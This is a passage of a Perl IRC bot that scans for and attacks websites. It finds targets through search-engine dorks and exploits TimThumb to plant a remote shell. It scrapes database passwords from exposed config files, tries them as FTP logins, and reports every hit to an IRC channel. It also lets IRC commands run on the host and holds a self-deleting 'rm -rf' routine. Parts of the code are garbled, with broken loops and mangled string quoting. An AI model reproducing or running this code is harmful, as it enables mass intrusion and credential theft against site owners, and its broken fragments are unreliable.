if ($check =~ m/Software : (.*?)
/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)/) {$safe = $1;}
if ($check =~ m/OS : (.*?)
/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)/) {$free = $1;}
&msg("$chan","$zerologo(@$engine)(@Vuln klo ga salah) ".$vuln1." (@SafeMode= $safe)(@OS= $os)(@FreeSpace= $free)");sleep(2);
&msg("$admin","$zerologo(@$engine)(@Vuln klo ga salah) ".$vuln1." (@SafeMode= $safe)(@OS= $os)(@FreeSpace= $free)");sleep(2);
}
}
else {
my $check = &get_content($vuln2);
if ( $check =~ /ZITH/i ) {
my $safe ="";
my $os ="";
my $free ="";
if ($check =~ m/Software : (.*?)
/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)/) {$safe = $1;}
if ($check =~ m/OS : (.*?)
/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)/) {$free = $1;}
&msg("$chan","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln2." 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
&msg("$admin","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln2." 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
}

my $check = &get_content($vuln3);
if ( $check =~ /ZITH/i ) {
my $safe ="";
my $os ="";
my $free ="";
if ($check =~ m/Software : (.*?)
/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)/) {$safe = $1;}
if ($check =~ m/OS : (.*?)
/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)/) {$free = $1;}
&msg("$chan","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln3." 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
&msg("$admin","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln3." 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
}

my $check = &get_content($vuln4);
if ( $check =~ /ZITH/i ) {
my $safe ="";
my $os ="";
my $free ="";
if ($check =~ m/Software : (.*?)
/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)/) {$safe = $1;}
if ($check =~ m/OS : (.*?)
/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)/) {$free = $1;}
&msg("$chan","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln4." 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
&msg("$admin","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln4." 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
}

my $check = &get_content($vuln5);
if ( $check =~ /ZITH/i ) {
my $safe ="";
my $os ="";
my $free ="";
if ($check =~ m/Software : (.*?)
/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)/) {$safe = $1;}
if ($check =~ m/OS : (.*?)
/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)/) {$free = $1;}
&msg("$chan","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln5." 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
&msg("$admin","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln5." 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
}

my $check = &get_content($vuln6);
if ( $check =~ /ZITH/i ) {
my $safe ="";
my $os ="";
my $free ="";
if ($check =~ m/Software : (.*?)
/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)/) {$safe = $1;}
if ($check =~ m/OS : (.*?)
/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)/) {$free = $1;}
&msg("$chan","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln6." 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
&msg("$admin","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln6." 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
}

my $check = &get_content($vuln7);
if ( $check =~ /ZITH/i ) {
my $safe ="";
my $os ="";
my $free ="";
if ($check =~ m/Software : (.*?)
/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)/) {$safe = $1;}
if ($check =~ m/OS : (.*?)
/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)/) {$free = $1;}
&msg("$chan","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln7." 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
&msg("$admin","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln7." 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
}

my $check = &get_content($vuln8);
if ( $check =~ /ZITH/i ) {
my $safe ="";
my $os ="";
my $free ="";
if ($check =~ m/Software : (.*?)
/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)/) {$safe = $1;}
if ($check =~ m/OS : (.*?)
/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)/) {$free = $1;}
&msg("$chan","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln8." 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
&msg("$admin","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln8." 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
}

my $check = &get_content($vuln9);
if ( $check =~ /ZITH/i ) {
my $safe ="";
my $os ="";
my $free ="";
if ($check =~ m/Software : (.*?)
/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)/) {$safe = $1;}
if ($check =~ m/OS : (.*?)
/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)/) {$free = $1;}
&msg("$chan","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln9." 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
&msg("$admin","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln9." 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
}
}exit;

}
}
}
}
}
}
######################################### Scanner TIMTHUMB #############################

sub thumb() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$thumblogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$thumblogo 8$engine 0Scan finish 15"); }
my $path = dirname($bug)."/";
my $xpl = "http://".$site.$bug."?src=".$thumbshell;
my $vuln1 = "http://".$site."0".$path."0cache/external_6563500d8e4c55f35a683f8b2ab6289b.php";
my $vuln2 = "http://".$site."0".$path."0cache/6563500d8e4c55f35a683f8b2ab6289b.php";
my $vuln3 = "http://".$site."0".$path."0temp/external_6563500d8e4c55f35a683f8b2ab6289b.php";
my $vuln4 = "http://".$site."0".$path."0temp/6563500d8e4c55f35a683f8b2ab6289b.php";
my $vuln5 = "http://".$site."0".$path."0wp-content/uploads/thumb-temp/6563500d8e4c55f35a683f8b2ab6289b.php";
my $html = get_content($xpl);
if ($html =~ /cache\/external_6563500d8e4c55f35a683f8b2ab6289b/ && $html !~ /can not be created/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $check = get_content("http://".$site.$path."cache/external_6563500d8e4c55f35a683f8b2ab6289b.php?");
if ($check =~ /GIF89a/i) {
my $sys = $1;
&msg("$admin","$thumblogo(8$engine15)8 ".$vuln1."?amg 15");
&msg("$chan","$thumblogo(8$engine15)8 ".$vuln1."?amg 15");
my $spread = get_content('http://'.$site.$path."cache/external_6563500d8e4c55f35a683f8b2ab6289b.php?pnt");
$spread = "";
sleep(3);
}
elsif ($check =~ /GIF89a/i) {
my $sys = $1;
&msg("$admin","$thumblogo(8$engine15)8 ".$vuln1."?amg 15");
&msg("$chan","$thumblogo(8$engine15)8 ".$vuln1."?amg 15");
sleep(3);
}
else {
}
} exit; } sleep(3);
}
elsif ($html =~ /cache\/6563500d8e4c55f35a683f8b2ab6289b/ && $html !~ /can not be created/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $check = get_content("http://".$site.$path."cache/6563500d8e4c55f35a683f8b2ab6289b.php?");
if ($check =~ /GIF89a/i) {
my $sys = $1;
&msg("$admin","$thumblogo(8$engine15)8 ".$vuln2."?amg 15");
&msg("$chan","$thumblogo(8$engine15)8 ".$vuln2."?amg 15");
sleep(3);
my $spread = get_content("http://".$site.$path."cache/6563500d8e4c55f35a683f8b2ab6289b.php?pnt");
$spread = "";
}
elsif ($check =~ /GIF89a/i) {
my $sys = $1;
&msg("$admin","$thumblogo(8$engine15)8 ".$vuln2."?amg 15");
&msg("$chan","$thumblogo(8$engine15)8 ".$vuln2."?amg 15");
sleep(3);
}
else {
}
} exit; } sleep(3);
}
elsif ($html =~ /temp\/external_6563500d8e4c55f35a683f8b2ab6289b/ && $html !~ /can not be created/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $check = get_content("http://".$site.$path."temp/external_6563500d8e4c55f35a683f8b2ab6289b.php?");
if ($check =~ /GIF89a/i) {
my $sys = $1;
&msg("$admin","$thumblogo(8$engine15)8 ".$vuln3."?amg 15");
&msg("$chan","$thumblogo(8$engine15)8 ".$vuln3."?amg 15");
my $spread = get_content("http://".$site.$path."temp/external_6563500d8e4c55f35a683f8b2ab6289b.php?pnt");
$spread = "";
}
elsif ($check =~ /GIF89a/i) {
my $sys = $1;
&msg("$admin","$thumblogo(8$engine15)8 ".$vuln3."?amg 15");
&msg("$chan","$thumblogo(8$engine15)8 ".$vuln3."?amg 15");
sleep(3);
}
else {
}
} exit; } sleep(3);
}
elsif ($html =~ /temp\/6563500d8e4c55f35a683f8b2ab6289b/ && $html !~ /can not be created/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $check = get_content("http://".$site.$path."temp/6563500d8e4c55f35a683f8b2ab6289b.php?");
if ($check =~ /GIF89a/i) {
my $sys = $1;
&msg("$admin","$thumblogo(8$engine15)8 ".$vuln4."?amg 15");
&msg("$chan","$thumblogo(8$engine15)8 ".$vuln4."?amg 15");
sleep(3);
my $spread = get_content("http://".$site.$path."temp/6563500d8e4c55f35a683f8b2ab6289b.php?pnt");
$spread = "";
}
elsif ($check =~ /GIF89a/i) {
my $sys = $1;
&msg("$admin","$thumblogo(8$engine15)8 ".$vuln4."?amg 15");
&msg("$chan","$thumblogo(8$engine15)8 ".$vuln4."?amg 15");
}
else {
}
} exit; } sleep(3);
}
elsif ($html =~ /wp-content\/uploads\/thumb-temp\/6563500d8e4c55f35a683f8b2ab6289b/ && $html !~ /can not be created/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $check = get_content("http://".$site.$path."wp-content/uploads/thumb-temp/6563500d8e4c55f35a683f8b2ab6289b.php?");
if ($check =~ /GIF89a/i) {
my $sys = $1;
&msg("$admin","$thumblogo(8$engine15)8 ".$vuln5."?amg 15");
&msg("$chan","$thumblogo(8$engine15)8 ".$vuln5."?amg 15");
sleep(3);
my $spread = get_content("http://".$site.$path."wp-content/uploads/thumb-temp/6563500d8e4c55f35a683f8b2ab6289b.php?");
$spread = "";
}
elsif ($check =~ /GIF89a/i) {
my $sys = $1;
&msg("$admin","$thumblogo(8$engine15)8 ".$vuln5."?amg 15");
&msg("$chan","$thumblogo(8$engine15)8 ".$vuln5."?amg 15");
sleep(3);
}
else {
}
} exit; } sleep(3);
}
}
}
}

#####################################################
sub whm() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$whmlogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$whmlogo 4$engine 0 Scan finish"); }
my $test1 = "http://".$site.$bug;
my $html = get_content($test1);
if ($html =~ /db_host/i) {
$userpass = getUserPass($html);
&msg("$chan","$whmlogo 4$engine (13@12DATABASE15)10 15(7 http://".$site." 15) 4$userpass");
my $lulz = "http://".$site;
my $user = "";
my $pass = "";
if($lulz =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) {
my $host = $2;
my @ftpu = split(":xXx:", $userpass);
$user = $ftpu[0];
$pass = $ftpu[1];
my $ftpstat = "";
if($user =~ /_/) { @userz = split("_", $user); $user = $userz[0];}
ftp_connect($test1,$host,$user,$pass,$chan,$engine);
}
sleep(3);
}
}
}
}

sub ftp_connect {
my $url = $_[0];
my $host = $_[1];
my $user = $_[2];
my $pass = $_[3];
my $chan = $_[4];
my $engine = $_[5];
my $success = 1;
use Net::FTP;
my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 2);
$success = 0 if $ftp->login($user,$pass);
$ftp->quit;
if ($success == 0) {
&msg("$chan","4$engine (13@12ACCEPT15) 15( 13".$host.":21 12".$user."13:12".$pass." 15)");
&msg("$admin","4$engine (13@12ACCEPT15) 15( 13".$host.":21 12".$user."13:12".$pass." 15)");
}
}

sub getUserPass() {
my $string = $_[0];
my @lol = split("\r\n", $string);
my $pass = "";
my $user = "";
foreach my $line (@lol) {
if(($line =~ m/db_password(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_password(.*?)=(.*?)"(.+?)";/i)) {
$pass = $3;
}
if(($line =~ m/db_username(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_username(.*?)=(.*?)"(.+?)";/i)) {
$user = $3;
}
}
return $user.":xXx:".$pass;
}

#########################################

sub search_engine() {
my (@total,@clean);
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $logo = $_[4];
if ($engine eq "Simbah") { my @google = google($dork); push(@total,@google); }
if ($engine eq "GooGle2") { my @google2 = &google2($dork); push(@total,@google2); }
if ($engine eq "AllTheWeb") { my @alltheweb = alltheweb($dork); push(@total,@alltheweb); }
if ($engine eq "Bing") { my @bing = bing($dork); push(@total,@bing); }
if ($engine eq "ALtaViSTa") { my @altavista = altavista($dork); push(@total,@altavista); }
if ($engine eq "AsK") { my @ask = ask($dork); push(@total,@ask); }
if ($engine eq "KvaSiR") { my @kvasir = kvasir($dork); push(@total,@kvasir); }
if ($engine eq "YahOo") { my @yahoo = yahoo($dork); push(@total,@yahoo); }
if ($engine eq "oNeT") { my @onet = &onet($dork); push(@total,@onet); }
if ($engine eq "SeZnaM") { my @seznam = &seznam($dork); push(@total,@seznam); }
if ($engine eq "interia") { my @interia = &interia($dork); push(@total,@interia); }
if ($engine eq "QuinT") { my @quint = quint($dork); push(@total,@quint); }
if ($engine eq "Yahoo2") { my @yahoo2 = yahoo2($dork); push(@total,@yahoo2); }
if ($engine eq "bypass") { my @bypass = &bypass($dork); push(@total,@bypass); }
if ($engine eq "Pagina") { my @pagina = &pagina($dork); push(@total,@pagina); }
@clean = &clean(@total);
&msg("$chan","$logo(4@8$engine15)4 Total:0 (".scalar(@total).")4 Clean:0 (".scalar(@clean).") ");
return @clean;
}

#########################################

sub isFound() {
my $status = 0;
my $link = $_[0];
my $reqexp = $_[1];
my $res = &get_content($link);
if ($res =~ /$reqexp/) { $status = 1 }
return $status;
}

sub get_content() {
my $url = $_[0];
my $ua = LWP::UserAgent->new(agent => $uagent);
$ua->timeout(7);
my $req = HTTP::Request->new(GET => $url);
my $res = $ua->request($req);
return $res->content;
}

#########################################
sub google() {
my @list;
my $key = $_[0];
for (my $i=0; $i<=1000; $i+=100){
my $search = ("http://www.google.com/search?q=&quot;.key($key)."&num=100&filter=0&start=".$i);
my $res = search_engine_query($search);
while ($res =~ m/\"]*)\//g) {
my $link = $1;
if ($link !~ /google/){
my @grep = links($link);
push(@list,@grep);
}
}
}
return @list;
}

sub google2() {
my @list;
my $key = $_[0];
my $b = 0;
my @doms =
("ae","com.af","com.ag","off.ai","am","com.ar","as","at","com.au","az","ba","com.bd","be","bg","bi","com.bo","com.br","bs","co.bw","com.bz","ca","cd","cg","ch","ci","co.c
k","cl","com.co","co.cr","com.cu","de","dj","dk","dm","com.do","com.ec","es","com.et","fi","com.fj","fm","fr","gg","com.gi","gl","gm","gr","com.gt","com.hk","hn","hr","co.hu
","co.id","ie","co.il","co.im","co.in","is","it","co.je","com.jm","jo","co.jp","co.ke","kg","co.kr","kz","li","lk","co.ls","lt","lu","lv","com.ly","mn","ms","com.mt","mu","mw","com.
mx","com.my","com.na","com.nf","com.ni","nl","no","com.np","nr","nu","co.nz","com.om","com.pa","com.pe","com.ph","com.pk","pl","pn","com.pr","pt","com.py","ro","ru",
"rw","com.sa","com.sb","sc","se","com.sg","sh","sk","sn","sm","com.sv","co.th","com.tj","tm","to","tp","com.tr","tt","com.tw","com.ua","co.ug","co.uk","com.uy","uz","co
m.vc","co.ve","vg","co.vi","com.vn","vu","ws","co.za","co.zm");
foreach my $domain (@doms) { $dom = $doms[rand(scalar(@doms))];
for ($b=1; $b<=200; $b+=10) {
my $search = ("http://www.google.&quot;.$dom."/search?num=5000&q=".&key($key)."&start=".$b."&sa=N");
my $res = &search_engine_query($search);
while ($res =~ m/\"]*)\//g) {
if ($1 !~ /google/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
} return @list;
}
}

sub alltheweb() {
my @list;
my $key = $_[0];
for (my $i=0; $i/g) {
my $link = $1;
if ($link !~ /bingj|yahoo/) {
$link =~ s/ //g;
$link =~ s/%3f/\?/g;
my @grep = links($link);
push(@list,@grep);
}
}
}
return @list;
}

sub kvasir() {
my @list;
my $key = $_[0];
for (my $i=10; $i<=1000; $i+=100){
my $search = ("http://www.kvasir.no/nettsok?q=&quot;.$i."&pageSize=100&q=".&key($key)."");
my $res = &search_engine_query($search);
while ($res =~ m/href=\"http:\/\/(.+?)\//g) {
my $link = $1; if ($link !~ /kvasir/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = links($link); push(@list,@grep);
}
}
}
return @list;
}

sub bing() {
my @list;
my $key = $_[0];
for (my $i=1; $i<=1000; $i+=10) {
my $search = ("http://www.bing.com/search?q=&quot;.key($key)."&filt=all&first=".$i."&FORM=PERE");
my $res = search_engine_query($search);
while ($res =~ m/\"]*)\//g) {
my $link = $1;
if ($link !~ /msn|live|bing/) {
my @grep = links($link);
push(@list,@grep);
}
}
}
return @list;
}

sub altavista() {
my @list;
my $key = $_[0];
for (my $i=1; $i<=1000; $i+=10){
my $search = ("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=&quot;.key($key)."&stq=".$i);
my $res = search_engine_query($search);
while ($res =~ m/(.+?)\//g) {
my $link = $1;
if ($link !~ /altavista/){
$link =~ s/<//g;
$link =~ s/ //g;
my @grep = links($link);
push(@list,@grep);
}
}
}
return @list;
}

sub ask() {
my @list;
my $key = $_[0];
for (my $i=0; $i<=1000; $i+=10) {
my $search = ("http://it.ask.com/web?q=&quot;.key($key)."&o=0&l=dir&qsrc=0&qid=EE90DE6E8F5370F363A63EC61228D4FE&dm=all&page=".$i);
my $res = search_engine_query($search);
while ($res =~ m/href=\"http:\/\/(.+?)\" onmousedown=/g) {
my $link = $1;
if ($link !~ /ask\.com/){
my @grep = links($link);
push(@list,@grep);
}
}
}
return @list;
}

sub yahoo() {
my @list;
my $key = $_[0];
for (my $i=1; $i<=500; $i+=1) {
my $search = ("http://www.search.yahoo.com/search?p=&quot;.key($key)."&ei=UTF-8&fr=yfp-t-501&fp_ip=IT&pstart=1&b=".$i);
my $res = search_engine_query($search);
while ($res =~ m/26u=(.*?)%26w=/g) {
my $link = $1;
if ($link!~ /yahoo/){
my @grep = links($link);
push(@list,@grep);
}
}
}
return @list;
}

sub onet() {
my @list;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=1000; $b+=100) {
my $search = ("http://szukaj.onet.pl/&quot;.$b.",query.html?qt=".&key($key));
my $res = &search_engine_query($search);
while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {
if ($1 !~ /webcache|query/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}

sub seznam() {
my @list;
my $key = $_[0];
for ($b=1; $b<=1000; $b+=100) {
my $search = ("http://search.seznam.cz/?q=&quot;.&key($key)."&count=10&pId=SkYLl2GXwV0CZZUQcglt&from=".$b);
my $res = &search_engine_query($search);
while ($res =~ m/<a href=\"http:\/\/(.+?)\" title/g) {
if ($1 !~ /seznam/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}

sub interia() {
my @list;
my $key = $_[0];
for ($b = 0;$bhttp:\/\/(.+?)\/(.*)/g) {
my $link = $1;
if ($link!~ /google|interia/) {
my @grep=links($link);
push(@list,@grep);
}
}
}
return @list;
}

sub quint() {
my @lst;
my $key = $_[0];
for (my $i=0; $i<=50; $i+=1){
my $search = ("http://quintura.com/?request=&quot;.key($key)."&tab=0&page=".$i."&tabid=");
my $res = search_engine_query($search);
while ($res =~ m/<a href=\"?http:\/\/(.+?)\//g) {
my $link = $1;
if ($link !~ /quintura/){
my @grep = links($link);
push(@lst,@grep);
}
}
}
return @lst;
}

sub yahoo2() {
my @list;
my $key = $_[0];
my $b = 0;
my @doms = ("id","au","br","ca","de","es","fr","it","uk","jp","kr","cn","th","vn","il","net","org","info");
foreach my $domain (@doms) { #$dom = $doms[rand(scalar(@doms))];
for (my $i=1; $i<=1000; $i+=100) {
my $search = ("http://&quot;.$domain.".search.yahoo.com/search?n=100&p=".&key($key)."&b=".$i);
my $res = &search_engine_query($search);
while ($res =~ m/http\%3a\/\/(.+?)\//g) {
if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
}
}
} return @list;
}

sub bypass() {
my @list;
my $key = $_[0];
my $search = ($bypass."?key=".&key($key));
my $res = &search_engine_query($search);
while ($res =~ m//g) {
# while ($res =~ m/\"]*)\//g) {
if ($link !~ /google/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
return @list;
}

sub pagina(){
my @list;
my $key = $_[0];
my $i = 0;
for ($i=0; $i<=100; $i+=1){
my $web=("http://startgoogle.startpagina.nl/index.php?q=&quot;.key($key)."&start=".$i."&origin=homepage&source=geentaal");
my $Res= search_engine_query($web);
while ($Res =~ m/\"]*)\//g){
if ($1 !~ /pagina|pagina's/){
my $k=$1;
my @grep=links($k);
push(@list,@grep);
}
}
}
return @list;
}

sub bing() {
my @list;
my $key = $_[0];
for (my $i=1; $i<=1000; $i+=10) {
my $search = ("http://www.bing.com/search?q=&quot;.key($key)."&filt=all&first=".$i."&FORM=PERE");
my $res = &search_engine_query($search);
while ($res =~ m/\"]*)\//g) {
my $link = $1;
if ($link !~ /msn|live|bing/) {
my @grep = links($link);
push(@list,@grep);
}
}
}
return @list;
}
}

#########################################

sub clean() {
my @cln = ();
my %visit = ();
foreach my $element (@_) {
$element =~ s/\/+/\//g;
next if $visit{$element}++;
push @cln, $element;
}
return @cln;
}

sub key() {
my $dork = $_[0];
$dork =~ s/ /\+/g;
$dork =~ s/:/\%3A/g;
$dork =~ s/\//\%2F/g;
$dork =~ s/\?/\%3F/g;
$dork =~ s/&/\%26/g;
$dork =~ s/\"/\%22/g;
$dork =~ s/,/\%2C/g;
$dork =~ s/\\/\%5C/g;
$dork =~ s/@/\%40/g;
$dork =~ s/\[/\%5B/g;
$dork =~ s/\]/\%5D/g;
$dork =~ s/\?/\%3F/g;
$dork =~ s/\=/\%3D/g;
$dork =~ s/\|/\%7C/g;
return $dork;
}

sub links() {
my @list;
my $link = $_[0];
my $host = $_[0];
my $hdir = $_[0];
$hdir =~ s/(.*)\/[^\/]*$/$1/;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host .= "/";
$link .= "/";
$hdir .= "/";
$host =~ s/\/\//\//g;
$hdir =~ s/\/\//\//g;
$link =~ s/\/\//\//g;
push(@list,$link,$host,$hdir);
return @list;
}

sub search_engine_query($) {
my $url = $_[0];
$url =~ s/http:\/\///;
my $host = $url;
my $query = $url;
my $page = "";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~ s/$host//;
if ($query eq "") { $query = "/"; }
eval {
my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: $uagent\r\n\r\n";
my @pages = ;
$page = "@pages";
close($sock);
};
return $page;
}

#########################################

sub shell() {
my $path = $_[0];
my $cmd = $_[1];
if ($cmd =~ /cd (.*)/) {
chdir("$1") || &msg("$path","4No such file or directory");
return;
}
elsif ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
my @output = `$cmd 2>&1 3>&1`;
my $c = 0;
foreach my $output (@output) {
$c++;
chop $output;
&msg("$path","$output");
if ($c == 5) { $c = 0; sleep 2; }
}
exit;
}}
}

sub isAdmin() {
my $status = 0;
my $nick = $_[0];
if ($nick eq $admin) { $status = 1; }
return $status;
}

sub msg() {
return unless $#_ == 1;
sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]");
}

sub SIGN() {
if (($powered !~ /e/)||($mail !~ /tk/)) {
print "\nLAMER DETECTED FVCK YOU. YOU NOT HACKER. U JUST SCRIPT KIDDIES\n\n";
exec("rm -rf $0 && pkill perl");
}
}

sub nick() {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}

sub notice() {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}